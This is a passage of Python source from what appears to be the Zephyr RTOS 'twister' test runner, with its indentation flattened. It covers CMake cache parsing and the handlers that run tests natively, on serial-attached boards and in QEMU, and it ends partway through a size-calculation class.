import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import hashlib
import threading
from collections import OrderedDict
import queue
import time
import csv
import glob
import random
import xml.etree.ElementTree as ET
import logging
from pathlib import Path
from distutils.spawn import find_executable
from colorama import Fore
import pickle
import platform
import yaml
import json
from multiprocessing import Lock, Process, Value
from typing import List
try:
# Use the C LibYAML parser if available, rather than the Python parser.
# It's much faster.
from yaml import CSafeLoader as SafeLoader
from yaml import CDumper as Dumper
except ImportError:
from yaml import SafeLoader, Dumper
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
try:
import pty
except ImportError as capture_error:
if os.name == "nt": # "nt" means that program is running on Windows OS
pass # "--device-serial-pty" option is not supported on Windows OS
else:
raise capture_error
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
# This is needed to load edt.pickle files.
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts",
"python-devicetree", "src"))
from devicetree import edtlib # pylint: disable=unused-import
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
import scl
import expr_parser
logger = logging.getLogger('twister')
logger.setLevel(logging.DEBUG)
class ExecutionCounter(object):
def __init__(self, total=0):
self._done = Value('i', 0)
self._passed = Value('i', 0)
self._skipped_configs = Value('i', 0)
self._skipped_runtime = Value('i', 0)
self._skipped_filter = Value('i', 0)
self._skipped_cases = Value('i', 0)
self._error = Value('i', 0)
self._failed = Value('i', 0)
self._total = Value('i', total)
self._cases = Value('i', 0)
self.lock = Lock()
def summary(self):
logger.debug("--------------------------------")
logger.debug(f"Total Test suites: {self.total}")
logger.debug(f"Total Test cases: {self.cases}")
logger.debug(f"Skipped test cases: {self.skipped_cases}")
logger.debug(f"Completed Testsuites: {self.done}")
logger.debug(f"Passing Testsuites: {self.passed}")
logger.debug(f"Failing Testsuites: {self.failed}")
logger.debug(f"Skipped Testsuites: {self.skipped_configs}")
logger.debug(f"Skipped Testsuites (runtime): {self.skipped_runtime}")
logger.debug(f"Skipped Testsuites (filter): {self.skipped_filter}")
logger.debug(f"Errors: {self.error}")
logger.debug("--------------------------------")
@property
def cases(self):
with self._cases.get_lock():
return self._cases.value
@cases.setter
def cases(self, value):
with self._cases.get_lock():
self._cases.value = value
@property
def skipped_cases(self):
with self._skipped_cases.get_lock():
return self._skipped_cases.value
@skipped_cases.setter
def skipped_cases(self, value):
with self._skipped_cases.get_lock():
self._skipped_cases.value = value
@property
def error(self):
with self._error.get_lock():
return self._error.value
@error.setter
def error(self, value):
with self._error.get_lock():
self._error.value = value
@property
def done(self):
with self._done.get_lock():
return self._done.value
@done.setter
def done(self, value):
with self._done.get_lock():
self._done.value = value
@property
def passed(self):
with self._passed.get_lock():
return self._passed.value
@passed.setter
def passed(self, value):
with self._passed.get_lock():
self._passed.value = value
@property
def skipped_configs(self):
with self._skipped_configs.get_lock():
return self._skipped_configs.value
@skipped_configs.setter
def skipped_configs(self, value):
with self._skipped_configs.get_lock():
self._skipped_configs.value = value
@property
def skipped_filter(self):
with self._skipped_filter.get_lock():
return self._skipped_filter.value
@skipped_filter.setter
def skipped_filter(self, value):
with self._skipped_filter.get_lock():
self._skipped_filter.value = value
@property
def skipped_runtime(self):
with self._skipped_runtime.get_lock():
return self._skipped_runtime.value
@skipped_runtime.setter
def skipped_runtime(self, value):
with self._skipped_runtime.get_lock():
self._skipped_runtime.value = value
@property
def failed(self):
with self._failed.get_lock():
return self._failed.value
@failed.setter
def failed(self, value):
with self._failed.get_lock():
self._failed.value = value
@property
def total(self):
with self._total.get_lock():
return self._total.value
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
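# Hypothetical sketch (not part of twister): how CMakeCacheEntry.from_line maps
# raw CMakeCache.txt lines to Python values, per the type table in the class
# docstring above. The sample entry names are made up.
def _example_cache_entry_parsing():
    lines = [
        '// a comment line',                 # -> None (no cache entry)
        'CMAKE_BUILD_TYPE:STRING=Debug',     # -> 'Debug'
        'MY_COMPONENTS:INTERNAL=a;b;c',      # -> ['a', 'b', 'c']
        'ENABLE_FOO:BOOL=ON',                # -> 1 (truthy, see _to_bool)
    ]
    entries = [CMakeCacheEntry.from_line(line, line_no)
               for line_no, line in enumerate(lines)]
    return [(e.name, e.value) for e in entries if e]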
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
class TwisterException(Exception):
pass
class TwisterRuntimeError(TwisterException):
pass
class ConfigurationError(TwisterException):
def __init__(self, cfile, message):
TwisterException.__init__(self, cfile + ": " + message)
class BuildError(TwisterException):
pass
class ExecutionError(TwisterException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/pylib/twister"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.state = "waiting"
self.run = False
self.duration = 0
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = math.ceil(instance.testcase.timeout * instance.platform.timeout_multiplier)
self.sourcedir = instance.testcase.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.set_state("running", self.duration)
self.generator = None
self.generator_cmd = None
self.suite_name_check = True
self.args = []
self.terminated = False
def set_state(self, state, duration):
self.state = state
self.duration = duration
def get_state(self):
ret = (self.state, self.duration)
return ret
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
def terminate(self, proc):
        # encapsulate terminate functionality so we do it consistently wherever
        # we might want to terminate the proc. We need try_kill_process_by_pid
        # because of how both newer ninja (1.6.0 or greater) and .NET / renode
        # work. Newer ninjas don't seem to pass SIGTERM down to the children
        # so we need to use try_kill_process_by_pid.
for child in psutil.Process(proc.pid).children(recursive=True):
try:
os.kill(child.pid, signal.SIGTERM)
except ProcessLookupError:
pass
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def add_missing_testscases(self, harness):
"""
        If the testsuite was broken by some error (e.g. timeout) it is necessary
        to add information about the remaining testcases, which were not
        performed due to this error.
"""
for c in self.instance.testcase.cases:
if c not in harness.tests:
harness.tests[c] = "BLOCK"
def _set_skip_reason(self, harness_state):
"""
        If a testcase written in the ztest framework is skipped by the
        "ztest_test_skip()" function, then such a testcase is marked in the
        instance.results dict as "SKIP", but the reason for this skipping is
        still "Unknown". This method picks up this situation and completes
        instance.reason properly.
"""
harness_state_pass = "passed"
harness_testcase_result_skip = "SKIP"
instance_reason_unknown = "Unknown"
if harness_state == harness_state_pass and \
self.instance.reason == instance_reason_unknown and \
harness_testcase_result_skip in self.instance.results.values():
self.instance.reason = "ztest skip"
def _verify_ztest_suite_name(self, harness_state, detected_suite_names, handler_time):
"""
        If test suite names were found in the test's C source code, then verify
        that the suite names detected in the output correspond to the expected
        suite names (and not the reverse).
"""
expected_suite_names = self.instance.testcase.ztest_suite_names
if not expected_suite_names or \
not harness_state == "passed":
return
if not detected_suite_names:
self._missing_suite_name(expected_suite_names, handler_time)
for detected_suite_name in detected_suite_names:
if detected_suite_name not in expected_suite_names:
self._missing_suite_name(expected_suite_names, handler_time)
break
def _missing_suite_name(self, expected_suite_names, handler_time):
"""
        Change the result of the performed test if a problem with a missing or
        improper suite name occurred.
"""
self.set_state("failed", handler_time)
for k in self.instance.testcase.cases:
self.instance.results[k] = "FAIL"
self.instance.reason = f"Testsuite mismatch"
logger.debug("Test suite names were not printed or some of them in " \
"output do not correspond with expected: %s",
str(expected_suite_names))
def _final_handle_actions(self, harness, handler_time):
self._set_skip_reason(harness.state)
# only for Ztest tests:
harness_class_name = type(harness).__name__
if self.suite_name_check and harness_class_name == "Test":
self._verify_ztest_suite_name(harness.state, harness.detected_suite_names, handler_time)
if not harness.matched_run_id and harness.run_id_exists:
self.set_state("failed", handler_time)
self.instance.reason = "RunID mismatch"
for k in self.instance.testcase.cases:
self.instance.results[k] = "FAIL"
self.record(harness)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.call_west_flash = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.ubsan = False
self.coverage = False
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def _output_reader(self, proc):
self.line = proc.stdout.readline()
def _output_handler(self, proc, harness):
if harness.is_pytest:
harness.handle(None)
return
log_out_fp = open(self.log, "wt")
timeout_extended = False
timeout_time = time.time() + self.timeout
while True:
this_timeout = timeout_time - time.time()
if this_timeout < 0:
break
reader_t = threading.Thread(target=self._output_reader, args=(proc,), daemon=True)
reader_t.start()
reader_t.join(this_timeout)
if not reader_t.is_alive():
line = self.line
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
else:
reader_t.join(0)
break
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
log_out_fp.close()
def handle(self):
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
elif self.call_west_flash:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind:
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log",
"--track-origins=yes",
] + command
run_valgrind = True
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
if self.ubsan:
env["UBSAN_OPTIONS"] = "log_path=stdout:halt_on_error=1:" + \
env.get("UBSAN_OPTIONS", "")
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_handler, args=(proc, harness,), daemon=True)
t.start()
t.join()
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
self.try_kill_process_by_pid()
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
if harness.is_pytest:
harness.pytest_run(self.log)
self.instance.results = harness.tests
if not self.terminated and self.returncode != 0:
if run_valgrind and self.returncode == 2:
self.set_state("failed", handler_time)
self.instance.reason = "Valgrind error"
else:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.set_state("failed", handler_time)
self.instance.reason = "Failed"
elif harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state("timeout", handler_time)
self.instance.reason = "Timeout"
self.add_missing_testscases(harness)
self._final_handle_actions(harness, handler_time)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.suite = None
def monitor_serial(self, ser, halt_fileno, harness):
if harness.is_pytest:
harness.handle(None)
return
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
if self.coverage:
            # Set capture_coverage to True to indicate that coverage data is
            # expected right after the test results; otherwise we exit as soon
            # as the test finishes.
harness.capture_coverage = True
ser.flush()
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
except serial.SerialException:
ser.close()
break
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
if not harness.capture_coverage:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testcase.harness_config.get("fixture")
for d in self.suite.duts:
if fixture and fixture not in d.fixtures:
continue
if d.platform != device or (d.serial is None and d.serial_pty is None):
continue
d.lock.acquire()
avail = False
if d.available:
d.available = 0
d.counter += 1
avail = True
d.lock.release()
if avail:
return d
return None
def make_device_available(self, serial):
for d in self.suite.duts:
if d.serial == serial or d.serial_pty:
d.available = 1
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, stderr = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
if proc.returncode != 0:
logger.error(f"Custom script failure: {stderr.decode(errors='ignore')}")
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
out_state = "failed"
runner = None
hardware = self.device_is_available(self.instance)
while not hardware:
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.device_is_available(self.instance)
runner = hardware.runner or self.suite.west_runner
serial_pty = hardware.serial_pty
ser_pty_process = None
if serial_pty:
master, slave = pty.openpty()
try:
ser_pty_process = subprocess.Popen(re.split(',| ', serial_pty), stdout=master, stdin=master, stderr=master)
except subprocess.CalledProcessError as error:
logger.error("Failed to run subprocess {}, error {}".format(serial_pty, error.output))
return
serial_device = os.ttyname(slave)
else:
serial_device = hardware.serial
logger.debug(f"Using serial device {serial_device} @ {hardware.baud} baud")
if (self.suite.west_flash is not None) or runner:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command_extra_args = []
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
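            # For illustration (values here are hypothetical): with
            # --west-flash="--erase", runner "pyocd" and a probe id of 1234,
            # the resulting command would be:
            #   west flash --skip-rebuild -d <build_dir> --runner pyocd \
            #       -- --erase --board-id 1234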
if self.suite.west_flash and self.suite.west_flash != []:
command_extra_args.extend(self.suite.west_flash.split(','))
if runner:
command.append("--runner")
command.append(runner)
board_id = hardware.probe_id or hardware.id
product = hardware.product
if board_id is not None:
if runner == "pyocd":
command_extra_args.append("--board-id")
command_extra_args.append(board_id)
elif runner == "nrfjprog":
command_extra_args.append("--dev-id")
command_extra_args.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "STLINK-V3":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
elif runner == "stm32cubeprogrammer":
command.append("--tool-opt=sn=%s" % (board_id))
if command_extra_args != []:
command.append('--')
command.extend(command_extra_args)
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
pre_script = hardware.pre_script
post_flash_script = hardware.post_flash_script
post_script = hardware.post_script
if pre_script:
self.run_custom_script(pre_script, 30)
try:
ser = serial.Serial(
serial_device,
baudrate=hardware.baud,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.set_state("failed", 0)
self.instance.reason = "Failed"
logger.error("Serial device error: %s" % (str(e)))
if serial_pty and ser_pty_process:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
# ignore unencodable unicode chars
logger.debug(stdout.decode(errors = "ignore"))
if proc.returncode != 0:
self.instance.reason = "Device issue (Flash?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
os.write(write_pipe, b'x') # halt the thread
out_state = "flash_error"
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
out_state = "timeout"
if ser.isOpen():
ser.close()
if serial_pty:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if out_state in ["timeout", "flash_error"]:
self.add_missing_testscases(harness)
if out_state == "timeout":
self.instance.reason = "Timeout"
elif out_state == "flash_error":
self.instance.reason = "Flash error"
if harness.is_pytest:
harness.pytest_run(self.log)
self.instance.results = harness.tests
        # Sometimes a test instance fails to execute and leaves an empty
        # results dictionary; fill its cases with BLOCK so the instance is
        # still included in the final report.
if self.instance.results == {}:
for k in self.instance.testcase.cases:
self.instance.results[k] = 'BLOCK'
if harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state(out_state, handler_time)
self._final_handle_actions(harness, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
self.make_device_available(serial_device)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
    We need to do this because once qemu starts, it runs forever until killed.
    Test cases emit special messages to the console as they run; we check
    for these to determine whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
if "ignore_qemu_crash" in instance.testcase.tags:
self.ignore_qemu_crash = True
self.ignore_unexpected_eof = True
else:
self.ignore_qemu_crash = False
self.ignore_unexpected_eof = False
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time and
it's maintained by counting guest instructions, so we use QEMU
process execution time to mostly simulate the time of guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
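    # Usage sketch (illustrative): for a live QEMU process with pid `qemu_pid`,
    #   QEMUHandler._get_cpu_time(qemu_pid)
    # returns the user + system CPU seconds consumed so far, which _thread()
    # below compares against the configured timeout.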
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness,
ignore_unexpected_eof=False):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering, we don't
# want read() or poll() to ever block if there is data in there
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
try:
if pid and this_timeout > 0:
                        # It's possible we polled nothing because the host did
                        # not schedule enough CPU time to the QEMU process
                        # during p.poll(this_timeout)
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
except ProcessLookupError:
out_state = "failed"
break
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
if harness.is_pytest:
harness.handle(None)
out_state = harness.state
break
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
if not ignore_unexpected_eof:
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug(f"QEMU ({pid}): {line}")
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state not in ['failed', 'unexpected eof', 'unexpected byte']:
out_state = harness.state
                # If we get some state, the test is making progress, so we
                # reset the timeout and wait 2 more seconds to catch anything
                # printed late. We wait much longer if code coverage is
                # enabled, since dumping this information can take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
if harness.is_pytest:
harness.pytest_run(logfile)
out_state = harness.state
handler_time = time.time() - start_time
logger.debug(f"QEMU ({pid}) complete ({out_state}) after {handler_time} seconds")
if out_state == "timeout":
handler.instance.reason = "Timeout"
handler.set_state("failed", handler_time)
elif out_state == "failed":
handler.instance.reason = "Failed"
handler.set_state("failed", handler_time)
elif out_state in ['unexpected eof', 'unexpected byte']:
handler.instance.reason = out_state
handler.set_state("failed", handler_time)
else:
handler.set_state(out_state, handler_time)
log_out_fp.close()
out_fp.close()
in_fp.close()
        if pid:
            try:
                os.kill(pid, signal.SIGTERM)
            except ProcessLookupError:
                # Oh well, as long as it's dead! User probably sent Ctrl-C
                pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testcase.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness,
self.ignore_unexpected_eof))
self.instance.results = harness.tests
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
is_timeout = False
qemu_pid = None
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
                # Sometimes QEMU can't handle the SIGTERM signal correctly;
                # in that case terminate the QEMU process directly and leave
                # twister to judge the testing result by the console output.
is_timeout = True
self.terminate(proc)
if harness.state == "passed":
self.returncode = 0
else:
self.returncode = proc.returncode
else:
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
logger.debug(f"No timeout, return code from QEMU ({qemu_pid}): {proc.returncode}")
self.returncode = proc.returncode
# Need to wait for harness to finish processing
# output from QEMU. Otherwise it might miss some
# error messages.
self.thread.join(0)
if self.thread.is_alive():
logger.debug("Timed out while monitoring QEMU output")
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
logger.debug(f"return code from QEMU ({qemu_pid}): {self.returncode}")
if (self.returncode != 0 and not self.ignore_qemu_crash) or not harness.state:
self.set_state("failed", 0)
if is_timeout:
self.instance.reason = "Timeout"
else:
self.instance.reason = "Exited with {}".format(self.returncode)
self.add_missing_testscases(harness)
self._final_handle_actions(harness, 0)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
